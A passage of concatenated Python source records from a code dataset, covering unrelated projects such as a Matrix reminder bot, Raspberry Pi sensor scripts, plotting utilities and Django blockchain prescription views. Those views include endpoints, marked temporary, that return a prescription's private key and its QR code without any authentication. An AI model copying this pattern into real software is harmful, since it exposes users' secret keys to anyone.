o3.append(l3)\r\n continue\r\n return o1,o2,o3\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n 
\r\n","sub_path":"bcjr1_2.py","file_name":"bcjr1_2.py","file_ext":"py","file_size_in_byte":6068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"295026618","text":"# -*-coding:utf-8-*-\n\nimport dbp_pb2 as dbp\nimport sys\nsys.path.append('/usr/local/lib/xlvip-1.0.0.egg')\nfrom xlvip.protobuf_message_factory import ProtobufMessageFactory\nfrom xlvip.protobuf_message_factory import message_to_string\nfrom xlvip.protobuf_socket import ProtobufSocket\nimport logging\n\nclass DbproxyClient(ProtobufSocket):\n logger = logging.getLogger('DbproxyClient')\n def query_gauth_user_info(self, userid):\n self.logger.debug('query_gauth_user_info: userid=' + str(userid))\n req = dbp.GauthUserInfoReq()\n req.sequence = 0\n req.userid = userid\n resp = dbp.GauthUserInfoResp()\n self.send_recv(req, resp)\n self.logger.debug('query_gauth_user_info: userid=' + str(userid)\n + ', got resp=' + message_to_string(resp))\n return resp\n\nif __name__ == '__main__':\n logging.basicConfig(level=logging.DEBUG) # log to the screen\n #logging.basicConfig(level=logging.DEBUG, filename='/tmp/dbproxy_client.log') # log to a file\n\n host = 'localhost'\n port = 12811\n client = DbproxyClient()\n client.open(host, port)\n resp = client.query_gauth_user_info(30456461)\n resp = client.query_gauth_user_info(2)\n client.close()\n\n # the same client can be opened and closed multiple times\n client.open(host, port)\n resp = client.query_gauth_user_info(7)\n client.close()\n\n","sub_path":"framework/xl_lixian_xlvip/examples/python/dbproxy_client.py","file_name":"dbproxy_client.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"375285700","text":"import logging\nfrom datetime import datetime, timedelta\nfrom typing import Dict, Optional, Tuple\n\nimport pytz\nfrom apscheduler.job import Job\nfrom apscheduler.schedulers.asyncio import AsyncIOScheduler\nfrom apscheduler.triggers.cron import CronTrigger\nfrom apscheduler.triggers.date import DateTrigger\nfrom apscheduler.triggers.interval import IntervalTrigger\nfrom apscheduler.util import timedelta_seconds\nfrom nio import AsyncClient\n\nfrom matrix_reminder_bot.config import CONFIG\nfrom matrix_reminder_bot.functions import make_pill, send_text_to_room\n\nlogger = logging.getLogger(__name__)\n\n# The object that runs callbacks at a certain time\nSCHEDULER = AsyncIOScheduler()\n\n# How often an alarm should sound after the reminder it's attached to\nALARM_TIMEDELTA = timedelta(minutes=5)\n\n\nclass Reminder(object):\n \"\"\"An object containing information about a reminder, when it should go off,\n whether it is recurring, etc.\n\n Args:\n client: The matrix client\n store: A Storage object\n room_id: The ID of the room the reminder should appear in\n start_time: When the reminder should first go off\n timezone: The database name of the timezone this reminder should act within\n reminder_text: The text to include in the reminder message\n recurse_timedelta: Optional. How often to repeat the reminder\n target_user: Optional. A user ID of a specific user to mention in the room while\n reminding\n alarm: Whether this reminder is an alarm. 
Alarms are reminders that fire every 5m\n after they go off normally, until they are silenced.\n \"\"\"\n\n def __init__(\n self,\n client: AsyncClient,\n store,\n room_id: str,\n reminder_text: str,\n start_time: Optional[datetime] = None,\n timezone: Optional[str] = None,\n recurse_timedelta: Optional[timedelta] = None,\n cron_tab: Optional[str] = None,\n target_user: Optional[str] = None,\n alarm: bool = False,\n ):\n self.client = client\n self.store = store\n self.room_id = room_id\n self.timezone = timezone\n self.start_time = start_time\n self.reminder_text = reminder_text\n self.cron_tab = cron_tab\n self.recurse_timedelta = recurse_timedelta\n self.target_user = target_user\n self.alarm = alarm\n\n # Schedule the reminder\n\n # Determine how the reminder is triggered\n if cron_tab:\n # Set up a cron trigger\n trigger = CronTrigger.from_crontab(cron_tab, timezone=timezone)\n elif recurse_timedelta:\n # Use an interval trigger (runs multiple times)\n\n # If the start_time of this reminder was in daylight savings for this timezone,\n # and we are no longer in daylight savings, alter the start_time by the\n # appropriate offset.\n # TODO: Ideally this would be done dynamically instead of on reminder construction\n tz = pytz.timezone(timezone)\n start_time = tz.localize(start_time)\n now = tz.localize(datetime.now())\n if start_time.dst() != now.dst():\n start_time += start_time.dst()\n\n trigger = IntervalTrigger(\n # timedelta.seconds does NOT give you the timedelta converted to seconds\n # Use a method from apscheduler instead\n seconds=int(timedelta_seconds(recurse_timedelta)),\n start_date=start_time,\n )\n else:\n # Use a date trigger (runs only once)\n trigger = DateTrigger(run_date=start_time, timezone=timezone)\n\n # Note down the job for later manipulation\n self.job = SCHEDULER.add_job(self._fire, trigger=trigger)\n\n self.alarm_job = None\n\n async def _fire(self):\n \"\"\"Called when a reminder fires\"\"\"\n logger.debug(\"Reminder in room %s fired: %s\", self.room_id, self.reminder_text)\n\n # Build the reminder message\n target = self.target_user if self.target_user else \"@room\"\n message = f\"{make_pill(target)} {self.reminder_text}\"\n\n # If this reminder has an alarm attached...\n if self.alarm:\n # Inform the user that an alarm will go off\n message += (\n f\"\\n\\n(This reminder has an alarm. You will be reminded again in 5m. \"\n f\"Use the `{CONFIG.command_prefix}silence` command to stop).\"\n )\n\n # Check that an alarm is not already ongoing from a previous run\n if not (self.room_id, self.reminder_text.upper()) in ALARMS:\n # Start alarming\n self.alarm_job = SCHEDULER.add_job(\n self._fire_alarm,\n trigger=IntervalTrigger(\n # timedelta.seconds does NOT give you the timedelta converted to\n # seconds. 
Use a method from apscheduler instead\n seconds=int(timedelta_seconds(ALARM_TIMEDELTA)),\n ),\n )\n ALARMS[(self.room_id, self.reminder_text.upper())] = self.alarm_job\n\n # Send the message to the room\n await send_text_to_room(self.client, self.room_id, message, notice=False)\n\n # If this was a one-time reminder, cancel and remove from the reminders dict\n if not self.recurse_timedelta and not self.cron_tab:\n # We set cancel_alarm to False here else the associated alarms wouldn't even\n # fire\n self.cancel(cancel_alarm=False)\n\n async def _fire_alarm(self):\n logger.debug(\"Alarm in room %s fired: %s\", self.room_id, self.reminder_text)\n\n # Build the alarm message\n target = self.target_user if self.target_user else \"@room\"\n message = (\n f\"Alarm: {target} {self.reminder_text} \"\n f\"(Use `{CONFIG.command_prefix}silence [reminder text]` to silence).\"\n )\n\n # Send the message to the room\n await send_text_to_room(self.client, self.room_id, message, notice=False)\n\n def cancel(self, cancel_alarm: bool = True):\n \"\"\"Cancels a reminder and all recurring instances\n\n Args:\n cancel_alarm: Whether to also cancel alarms of this reminder\n \"\"\"\n logger.debug(\n \"Cancelling reminder in room %s: %s\", self.room_id, self.reminder_text\n )\n\n # Remove from the in-memory reminder and alarm dicts\n REMINDERS.pop((self.room_id, self.reminder_text.upper()), None)\n\n # Delete the reminder from the database\n self.store.delete_reminder(self.room_id, self.reminder_text)\n\n # Delete any ongoing jobs\n if self.job and SCHEDULER.get_job(self.job.id):\n self.job.remove()\n\n # Cancel alarms of this reminder if required\n if cancel_alarm:\n ALARMS.pop((self.room_id, self.reminder_text.upper()), None)\n\n if self.alarm_job and SCHEDULER.get_job(self.alarm_job.id):\n self.alarm_job.remove()\n\n\n# Global dictionaries\n#\n# Both feature (room_id, reminder_text) tuples as keys\n#\n# reminder_text should be accessed and stored as uppercase in order to\n# allow for case-insensitive matching when carrying out user actions\nREMINDERS: Dict[Tuple[str, str], Reminder] = {}\nALARMS: Dict[Tuple[str, str], Job] = {}\n","sub_path":"matrix_reminder_bot/reminder.py","file_name":"reminder.py","file_ext":"py","file_size_in_byte":7337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"392191208","text":"from picamera import PiCamera\nfrom time import sleep\nimport time\nimport datetime\nimport RPi.GPIO as GPIO\n\ndef getDateString():\n dt = datetime.datetime.now();y = dt.year - 2000 ;hr = dt.hour\n if hr < 10:\n hr = \"0\" + str(hr)\n me = dt.minute\n if me < 10:\n me = \"0\" + str(me)\n timestring = str(y) + str(dt.month) + str(dt.day)+\"-\"+str(hr)+str(me)+\".\"+str(dt.second)\n return timestring\n\ndef camPict():\n filename = getDateString()\n filename = filename + \".jpg\"\t\n camera = PiCamera()\n #camera.resolution = (1024, 768)\n camera.rotation = 180\n camera.start_preview()\n # Camera warm-up time\n sleep(1)\n camera.capture(filename)\n camera.stop_preview()\n\ndef ussScan():\n try:\n GPIO.setmode(GPIO.BOARD)\n PIN_TRIGGER = 7\n PIN_ECHO = 11\n GPIO.setup(PIN_TRIGGER, GPIO.OUT)\n GPIO.setup(PIN_ECHO, GPIO.IN)\n GPIO.output(PIN_TRIGGER, GPIO.LOW)\n #print (\"Waiting for sensor to settle\")\n time.sleep(1)\n print (\"Calculating distance\")\n GPIO.output(PIN_TRIGGER, GPIO.HIGH)\n time.sleep(0.00001)\n GPIO.output(PIN_TRIGGER, GPIO.LOW)\n while GPIO.input(PIN_ECHO)==0:\n pulse_start_time = time.time()\n while GPIO.input(PIN_ECHO)==1:\n 
pulse_end_time = time.time()\n pulse_duration = pulse_end_time - pulse_start_time\n distance = round(pulse_duration * 17150, 2)\n print (\"Distance:\",distance,\"cm\")\n if (distance < 100):\n camPict()\n\n finally:\n GPIO.cleanup()\n\ndef main():\n count = 0\n while(count == 0):\n ussScan()\n\nif __name__ == '__main__':\n\tmain()\n\n\n\n\n\n","sub_path":"camera/cam-uss-0.py","file_name":"cam-uss-0.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"182616981","text":"# coding=utf-8\nfrom __future__ import absolute_import, division, print_function, unicode_literals\n\nimport pytest\n\nfrom scout_apm.core.metadata import report_app_metadata\nfrom tests.compat import mock\nfrom tests.tools import pretend_package_unavailable\n\n\n@mock.patch(\"scout_apm.core.socket.CoreAgentSocket.send\")\ndef test_report_app_metadata(send):\n report_app_metadata()\n\n assert send.call_count == 1\n (command,), kwargs = send.call_args\n assert kwargs == {}\n\n message = command.message()\n assert message[\"ApplicationEvent\"][\"event_type\"] == \"scout.metadata\"\n data = message[\"ApplicationEvent\"][\"event_value\"]\n assert data[\"language\"] == \"python\"\n # pytest is installed, since it's running tests right now.\n assert (\"pytest\", pytest.__version__) in data[\"libraries\"]\n\n\n@mock.patch(\"scout_apm.core.socket.CoreAgentSocket.send\")\ndef test_report_app_metadata_no_pkg_resources(send):\n with pretend_package_unavailable(\"pkg_resources\"):\n report_app_metadata()\n\n assert send.call_count == 1\n (command,), kwargs = send.call_args\n assert kwargs == {}\n\n message = command.message()\n assert message[\"ApplicationEvent\"][\"event_type\"] == \"scout.metadata\"\n assert message[\"ApplicationEvent\"][\"event_value\"][\"libraries\"] == []\n","sub_path":"tests/unit/core/test_metadata.py","file_name":"test_metadata.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"306833045","text":"#Write a program that prompts for a file name, then opens that file and reads through the file, looking for lines of the form:\n#X-DSPAM-Confidence: 0.8475\n#Count these lines and extract the floating point values from each of the lines and compute the average of those values and produce an output as shown below.\n#Do not use the sum() function or a variable named sum in your solution.\n#You can download the sample data at http://www.py4e.com/code3/mbox-short.txt when you are testing below enter mbox-short.txt as the file name.\ncount = 0\ntot = 0\nfname = input(\"Enter file name: \")\nfh = open(fname)\nfor line in fh:\n if line.startswith(\"X-DSPAM-Confidence:\") :\n count = count + 1\n num = float(line[20:]) #the confidence value starts at position 20 in these lines\n tot = num + tot\navg = tot/count\nprint(\"Average spam confidence:\",avg)\n","sub_path":"ex7.2/ex7.2.py","file_name":"ex7.2.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"405678704","text":"import pandas as pd\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport importlib, argparse\nimport csv\n\n# ------------------------------------------------------------------------------------------------\n# This script will draw a table with AUCs (areas under ROC curve) values based on the CSV\n# file stored in \"AUCs_path\" with version 
specified by \"training_version\" from the provided\n# config file.\n# ------------------------------------------------------------------------------------------------\n\nparser = argparse.ArgumentParser(description=\"Argument parser\")\nparser.add_argument(\"-c\", \"--config\", dest=\"config_path\", default=None, required=True, help=\"Path to the config file\")\nargs = parser.parse_args()\nconfig_path = args.config_path.strip(\".py\").replace(\"/\", \".\")\nconfig = importlib.import_module(config_path)\n\nn_bins_rinv = 3\nn_bins_mass = 6\n\nmatplotlib.rcParams.update({'font.size': 16})\nplt.rc('text', usetex=True)\nplt.rc('font', family='serif')\n\n\ndef plot_aucs(dataframe, title=None):\n fac = 1.5\n \n plt.figure(figsize=(1.1 * fac * 6.9, 1.1 * fac * 6))\n plt.imshow(dataframe, cmap='viridis')\n \n cb = plt.colorbar()\n cb.set_label(label='AUC value', fontsize=18 * fac)\n plt.clim(0.58, 0.9)\n \n plt.xticks(np.arange(0, n_bins_rinv, 1), map(lambda x: '{:.2f}'.format(float(x)), np.unique(dataframe.columns)))\n plt.yticks(np.arange(0, n_bins_mass, 1), np.unique(dataframe.index))\n \n plt.title(title, fontsize=fac * 25)\n plt.ylabel(r'$M_{Z^\\prime}$ (GeV)', fontsize=fac * 20)\n plt.xlabel(r'$r_{inv}$', fontsize=fac * 20)\n plt.xticks(fontsize=18 * fac)\n plt.yticks(fontsize=18 * fac)\n \n for mi, (mass, row) in enumerate(dataframe.iterrows()):\n for ni, (nu, auc) in enumerate(row.iteritems()):\n plt.text(ni, mi, '{:.3f}'.format(auc), ha=\"center\", va=\"center\", color=\"w\", fontsize=18 * fac)\n\n\ndef read_csv_file():\n aucs_path = config.evaluation_general_settings[\"aucs_path\"]\n filename = aucs_path + config.file_name + \"_v\" + str(config.best_model)\n data = {}\n masses = []\n rinvs = []\n \n with open(filename, newline='') as csvfile:\n reader = csv.reader(csvfile, delimiter=',')\n \n first = True\n \n for row in reader:\n if first:\n first = False\n continue\n \n mass = row[0]\n rinv = row[1]\n auc = row[2]\n \n data[(mass, rinv)] = auc\n \n if mass not in masses:\n masses.append(mass)\n \n if rinv not in rinvs:\n rinvs.append(rinv)\n \n masses.sort()\n rinvs.sort()\n \n return masses, rinvs, data\n\n\ndef produce_dataframe(masses, rinvs, data):\n columns = {}\n \n for mass in masses:\n for rinv in rinvs:\n if rinv not in columns.keys():\n columns[rinv] = []\n\n if (mass, rinv) in data.keys():\n columns[rinv].append(data[(mass, rinv)])\n else:\n columns[rinv].append(0.0)\n \n return pd.DataFrame(columns, index=masses, dtype=float)\n\n\nmasses, rinvs, data = read_csv_file()\ndataframe = produce_dataframe(masses, rinvs, data)\n\nplot_aucs(dataframe)\nplt.show()","sub_path":"training/drawAUCtable.py","file_name":"drawAUCtable.py","file_ext":"py","file_size_in_byte":3280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"609630831","text":"# coding: utf-8\nfrom common.mnist import load_mnist\nfrom deep_convnet import DeepConvNet\nfrom trainer import Trainer\n\n(x_train, t_train), (x_test, t_test) = load_mnist(flatten=False)\n\nnetwork = DeepConvNet()\ntrainer = Trainer(network,\n x_train,\n t_train,\n x_test,\n t_test,\n epochs=20,\n mini_batch_size=100,\n optimizer='Adam',\n optimizer_param={'lr': 0.001},\n evaluate_sample_num_per_epoch=1000)\ntrainer.train()\n\n# Save the trained parameters\nnetwork.save_params(\"deep_convnet_params.pkl\")\nprint(\"Saved Network 
Parameters!\")\n","sub_path":"train_deepnet.py","file_name":"train_deepnet.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"9225876","text":"import matplotlib.pyplot as plt\nfrom math import sqrt\n\naas = ['A','C','D','E','F','G','H','I','K','L','M','N','P','Q','R','S','T','V','W','Y']\n# find number of amino acids\nnaa = len(aas)\n\n# read info from file aa_counts.txt\ninfo = {}\nfile_name = '2a_aa_counts.txt'\nfile = open(file_name)\nfor line in file:\n\tif (line[0:1] != '#'):\n\t\tdata = line.split()\n\t\t#print (data)\n\t\tif (len(data) > 1):\n\t\t\torganism = data[0]\n\t\t\tinfo[organism] = []\n\t\t\tGC_cont = float(data[1])\n\t\t\tinfo[organism].append(GC_cont)\n\t\t\tfor i in range(naa):\n\t\t\t\tinfo[organism].append(float(data[2+i]))\nfile.close()\n\n# find number of organisms\nn_org = len(info)\n\n# calculate percentages\npercentages = naa*[0]\nfor i in range(naa):\n\tfor organism in info:\n\t\tpercentages[i] += float(info[organism][i+1])\n\tpercentages[i] /= n_org\n# calculate standard deviation\nstd_dev = naa*[0]\nfor i in range(naa):\n\tfor organism in info:\n\t\tstd_dev[i] += (float(info[organism][i+1]) - percentages[i])**2\n\tstd_dev[i] = sqrt(std_dev[i]/n_org)\n\n#plot \nind = range(1,naa+1)\t\t\nfig = plt.figure(figsize=(8, 6))\nplt.rc('grid',ls=\"--\")\nsub = fig.add_subplot(1,1,1)\nsub.bar(ind,percentages,yerr=std_dev,error_kw={'capsize':3, 'capthick':1})\nsub.set_xlabel('amino acid')\nsub.set_xticks(ind)\nsub.set_xticklabels(aas)\nsub.set_ylabel('occurrence [%]')\nsub.set_ylim(0,12)\n\nplt.show()\n# save plot to file\nfig.savefig(\"2a_aa_freq.pdf\", bbox_inches='tight')\n\nplt.close(fig)\n\n","sub_path":"python/ens210_computationalbiology/exam1/2a_2_plot_aa_freq.py","file_name":"2a_2_plot_aa_freq.py","file_ext":"py","file_size_in_byte":1399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"645273692","text":"from PIL import Image\n# open an image file (.bmp,.jpg,.png,.gif) you have in the working folder\n# //imageFile = \"03802.png\"\n\nimport os\n\narr=os.listdir()\n\nfor imageFile in arr:\n if \"png\" in imageFile:\n im1 = Image.open(imageFile)\n # adjust width and height to your needs\n width = 416\n height = 416\n # use one of these filter options to resize the image\n im2 = im1.resize((width, height), Image.NEAREST) # use nearest neighbour\n # im3 = im1.resize((width, height), Image.BILINEAR) # linear interpolation in a 2x2 environment\n # im4 = im1.resize((width, height), Image.BICUBIC) # cubic spline interpolation in a 4x4 environment\n # im5 = im1.resize((width, height), Image.ANTIALIAS) # best down-sizing filter\n ext = \".png\"\n # print(imageFile.split(\".\")[0])\n num=imageFile.split(\".\")[0]\n print(num)\n print(type(num))\n im2.save(imageFile)\n # im2.save(imageFile+ ext)\n # im3.save(\"BILINEAR\" + ext)\n # im4.save(\"BICUBIC\" + ext)\n # im5.save(\"ANTIALIAS\" + ext)\n","sub_path":"resize.py","file_name":"resize.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"125625686","text":"import threading\nfrom time import sleep\n\n\ndef test1():\n sum = 1\n for i in range(5000000):\n sum += i\n print('1 done')\n return '1'\n\n\ndef test2():\n sum = 1\n for i in range(1000000):\n sum += i\n print('2 done')\n return '2'\n\n\ndef test3():\n sum = 0\n for i in range(100000):\n sum += i\n print('3 done')\n return 
'3'\n\n\ndef main():\n resp1 = threading.Thread(target=test1, args=()).start()\n resp2 = threading.Thread(target=test2, args=()).start()\n resp3 = threading.Thread(target=test3, args=()).start()\n print('main!')\n print(resp1, resp2, resp3)\n sleep(10)\n print(resp1, resp2, resp3)\n\nmain()","sub_path":"search/tests/test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"185729626","text":"# encoding=utf-8\n# Time: 8/28/17\n# File: job.py\n# Author: jian\nfrom __future__ import division\nfrom __future__ import unicode_literals\nfrom __future__ import print_function\n\nimport uuid\nimport threading\nimport numpy as np\nimport re\nimport copy\nimport sys\nfrom antgo.utils.encode import *\nfrom antgo.utils import logger\nimport scipy.misc\nimport base64\nimport os\n\nPYTHON_VERSION = sys.version_info[0]\nif PYTHON_VERSION == 2:\n import Queue as queue\nelif PYTHON_VERSION == 3:\n import queue as queue\n\n\nclass Chart():\n def __init__(self,title=\"chart\", x_axis=\"x\", y_axis=\"y\"):\n self.chart_title = title\n self.chart_x_axis = x_axis\n self.chart_y_axis = y_axis\n self.chart_id = unicode(uuid.uuid1()) if PYTHON_VERSION == 2 else str(uuid.uuid1())\n self.chart_channels = []\n\n @property\n def id(self):\n return self.chart_id\n\n @property\n def title(self):\n return self.chart_title\n\n @property\n def x_axis(self):\n return self.chart_x_axis\n\n @property\n def y_axis(self):\n return self.chart_y_axis\n\n @property\n def channels_num(self):\n return len(self.chart_channels)\n\n def bind_channel(self, channel):\n channel.id = len(self.chart_channels)\n channel.chart = self\n self.chart_channels.append(channel)\n\n def clone(self):\n self.chart_id = unicode(uuid.uuid1()) if PYTHON_VERSION == 2 else str(uuid.uuid1())\n\n\nclass Channel():\n def __init__(self, channel_name = None, channel_type = None, channel_job=None, **channel_params):\n self.channel_id = -1\n self.channel_name = channel_name\n self.channel_type = channel_type\n self.channel_chart = None\n self.channel_job = channel_job\n self.channel_params = channel_params\n assert(self.channel_type in [\"IMAGE\", \"NUMERIC\", \"HISTOGRAM\"])\n\n @property\n def params(self):\n return self.channel_params\n\n @property\n def chart(self):\n return self.channel_chart\n @chart.setter\n def chart(self,val):\n self.channel_chart = val\n\n @property\n def id(self):\n return self.channel_id\n @id.setter\n def id(self,val):\n self.channel_id = val\n\n @property\n def name(self):\n return self.channel_name\n\n def reorganize_data(self, data_type, data):\n if data_type == \"IMAGE\":\n return self.reorganize_image_data(data)\n elif data_type == \"NUMERIC\":\n return self.reorganize_numeric_data(data)\n elif data_type == \"HISTOGRAM\":\n return self.reorganize_histogram_data(data)\n else:\n return data\n\n def reorganize_image_data(self, data):\n data_x, data_y = data\n try:\n data_x = float(data_x)\n except:\n logger.error(\"Channel X Must be Scalar Data\")\n return None\n\n try:\n if len(data_y.shape) != 2 and len(data_y.shape) != 3:\n logger.error(\"Channel Y Must be 2 or 3 Dimension\")\n return None\n if len(data_y.shape) == 3:\n if data_y.shape[2] != 3:\n logger.error(\"Channel Y Must Possess 3 or 1 Channels\")\n return None\n\n allowed_size = 50.0\n height, width = data_y.shape[:2]\n min_scale = allowed_size / np.minimum(height, width)\n\n new_height = int(height * min_scale)\n new_width = int(width * min_scale)\n 
resized_img = scipy.misc.imresize(data_y,(new_height, new_width))\n # resized_img = data_y\n if resized_img.dtype == np.uint8:\n return (data_x, base64.b64encode(png_encode(resized_img)).decode('utf-8'))\n\n max_val = np.max(resized_img.flatten())\n min_val = np.min(resized_img.flatten())\n if len(data_y.shape) == 3:\n resized_img = ((resized_img - np.tile(min_val, (1,1,3))) / np.tile(max_val, (1,1,3))) * 255\n resized_img = resized_img.astype(np.uint8)\n else:\n resized_img = (resized_img - min_val) / max_val * 255\n resized_img = resized_img.astype(np.uint8)\n\n return (data_x, base64.b64encode(png_encode(resized_img)).decode('utf-8'))\n except:\n logger.error(\"Channel Y Must be Numpy Array\")\n\n def reorganize_numeric_data(self, data):\n data_x, data_y = data\n try:\n data_x = float(data_x)\n except:\n logger.error(\"Channel X Must be Scalar Data\")\n\n try:\n data_y = float(data_y)\n except:\n logger.error(\"Channel Y Must be Scalar Data\")\n return (data_x, data_y)\n\n def reorganize_histogram_data(self, data):\n data_x, data_y = data\n try:\n data_x = float(data_x)\n except:\n logger.error(\"Channel X Must be Scalar Data\")\n\n try:\n data_y = data_y.flatten()\n bins = 10 # default bins\n if \"BINS\" in self.params:\n bins = self.params['BINS']\n\n data_y = np.histogram(data_y, bins)\n except:\n logger.error(\"Channel Y Must be Numpy Array\")\n return (data_x, data_y)\n\n def send(self, x=0, y=0):\n # {\"CHART\", (chart_id, chart_title,...)}\n x_copy = copy.deepcopy(x)\n y_copy = copy.deepcopy(y)\n data = {\"CHANNEL\": self,\n \"DATA\": {\"CHART\": [self.chart.id,\n self.chart.title,\n self.chart.x_axis,\n self.chart.y_axis,\n self.chart.channels_num,\n self.id,\n self.channel_type,\n self.channel_name,\n x_copy,\n y_copy]}}\n\n if self.channel_job != None:\n # send data\n self.channel_job.send(data)\n\n\nclass Job(threading.Thread):\n def __init__(self, context=None):\n super(Job, self).__init__()\n self.data_queue = queue.Queue()\n self.job_context = context\n self.setDaemon(True)\n self.pid = str(os.getpid())\n self.charts = []\n \n def create_channel(self, channel_name, channel_type, **kwargs):\n return Channel(channel_name, channel_type, self, **kwargs)\n\n def create_chart(self, chart_channels, chart_title, chart_x_axis=\"x\", chart_y_axis=\"y\"):\n chart = Chart(chart_title, chart_x_axis, chart_y_axis)\n self.charts.append(chart)\n channel_type = None\n for cc in chart_channels:\n if channel_type is None:\n channel_type = cc.channel_type\n else:\n # assert channel has the same type\n assert(channel_type == cc.channel_type)\n\n chart.bind_channel(cc)\n\n @property\n def context(self):\n return self.job_context\n\n def send(self, data):\n if data is None:\n return\n\n # running stage\n data[\"STAGE\"] = self.context.stage\n self.data_queue.put(data)\n\n def stop(self):\n self.data_queue.put(None)\n\n def clone_charts(self):\n for chart in self.charts:\n chart.clone()\n\n def run(self):\n while True:\n # 0.step get data\n data = self.data_queue.get()\n\n # check whether stop thread\n if data is None:\n break\n\n # 1.step reorganize data\n job_stage = data.pop('STAGE')\n if 'CHANNEL' in data:\n job_channel = data['CHANNEL']\n chart_data = data['DATA'][\"CHART\"]\n\n # reorganize (channel_type, channel_y)\n reorganized_xy= job_channel.reorganize_data(chart_data[6], [chart_data[8], chart_data[9]])\n if reorganized_xy is None:\n continue\n chart_data[8] = reorganized_xy[0]\n chart_data[9] = reorganized_xy[1]\n\n data['DATA'][\"CHART\"] = chart_data\n\n # 2.step sending to 
mltalker\n if self.job_context != None and data['DATA'] != None and not self.job_context.quiet:\n self.job_context.send(data['DATA'], job_stage)","sub_path":"antgo/job.py","file_name":"job.py","file_ext":"py","file_size_in_byte":7406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"376901647","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\n# Python libs\nimport hashlib\n# Django packages\nfrom django.http import HttpResponse\nfrom django.shortcuts import render, redirect, render_to_response\nfrom django.views.generic import View, CreateView, ListView\n# Our Models\nfrom django.conf import settings\nfrom .models import Prescription, Block\nfrom .utils import get_qr_code, is_rx_in_block\n# Blockcypher\nfrom blockchain.utils import PoE\n\n\nclass ValidateRxView(View):\n template = \"blockchain/validate.html\"\n\n def get(self, request, *args, **kwargs):\n hash_rx = kwargs.get(\"hash_rx\")\n # Temporary solution\n rx = Prescription.objects.get(rxid=hash_rx)\n\n if hash_rx:\n # init\n context = {}\n _poe = PoE()\n try:\n context[\"poe_url\"] = settings.BASE_POE_URL+\"/\"+settings.CHAIN+\"/tx/\"+rx.block.poetxid+\"/\"\n context[\"poe\"] = _poe.attest(rx.block.poetxid)\n context[\"merkle_root\"] = rx.block.merkleroot\n except Exception as e:\n print(\"Error :%s, type(%s)\" % (e, type(e)))\n return redirect(\"/\")\n return render(request, self.template, context)\n # Should add a message\n return redirect(\"/\")\n\ndef poe(request):\n ''' Proof of existence explanation '''\n return render(request, \"blockchain/poe.html\")\n\ndef rx_detail(request, hash_rx=False):\n ''' Get a hash and return the rx '''\n if request.GET.get(\"hash_rx\", False):\n hash_rx = request.GET.get(\"hash_rx\")\n\n if hash_rx:\n context = {}\n\n try:\n rx = Prescription.objects.get(rxid=hash_rx)\n except Exception as e:\n try:\n rx = Prescription.objects.get(tx_txid=hash_rx)\n except Exception as e:\n print(\"Error :%s, type(%s)\" % (e, type(e)))\n return redirect(\"/block/?block_hash=%s\" % hash_rx)\n\n\n medications = get_simplified_medication_json(rx.medications.all())\n context[\"rx\"] = rx\n context[\"medications\"] = medications\n return render(request, \"blockchain/rx_detail.html\", context)\n\n\n return redirect(\"/\")\n\n\ndef rx_priv_key(request, hash_rx=False):\n # Temporary way to show key just for test, remove later\n try:\n rx = Prescription.objects.get(rxid=hash_rx)\n return HttpResponse(rx.get_priv_key, content_type=\"text/plain\")\n except Exception as e:\n return HttpResponse(\"Not Found\", content_type=\"text/plain\")\n\n\ndef qr_code(request, hash_rx=False):\n # Temporary way to show qrcode just for test, remove later\n try:\n rx = Prescription.objects.get(rxid=hash_rx)\n img = get_qr_code(rx.get_priv_key)\n return HttpResponse(img, content_type=\"image/jpeg\"\n)\n except Exception as e:\n print(\"Error :%s, type(%s)\" % (e, type(e)))\n return HttpResponse(\"Not Found\", content_type=\"text/plain\")\n\n\n\ndef block_detail(request, block_hash=False):\n ''' Get a hash and return the block '''\n if request.GET.get(\"block_hash\", False):\n block_hash = request.GET.get(\"block_hash\")\n\n if block_hash:\n context = {}\n try:\n block = Block.objects.get(hash_block=block_hash)\n context[\"block_object\"] = block\n # Create URL\n context[\"poe_url\"] = settings.BASE_POE_URL+\"/\"+settings.CHAIN+\"/tx/\"+block.poetxid+\"/\"\n return render(request, \"blockchain/block_detail.html\", context)\n\n except Exception as e:\n 
